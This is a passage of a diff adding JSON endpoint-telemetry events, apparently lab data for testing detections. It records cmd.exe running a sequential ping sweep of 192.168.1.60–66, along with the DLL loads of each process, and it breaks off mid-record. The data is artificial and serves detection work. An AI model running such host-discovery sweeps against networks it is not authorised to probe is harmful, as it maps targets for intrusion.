"{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883572268869984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "process", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "subtype": "terminate", + "timestamp": 131883572268869984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "process", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "subtype": "terminate", + "timestamp": 131883572269020000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "process", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572271990000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.60", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "process", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572276830000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.61", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "process", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572281840000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.62", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "process", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572286990000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.63", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287300000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "process", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572291830000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.64", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572291980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "process", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572296830000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.65", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4656, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572297020000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "process", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572301840000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.66", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572302020000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7784, + "process_name": 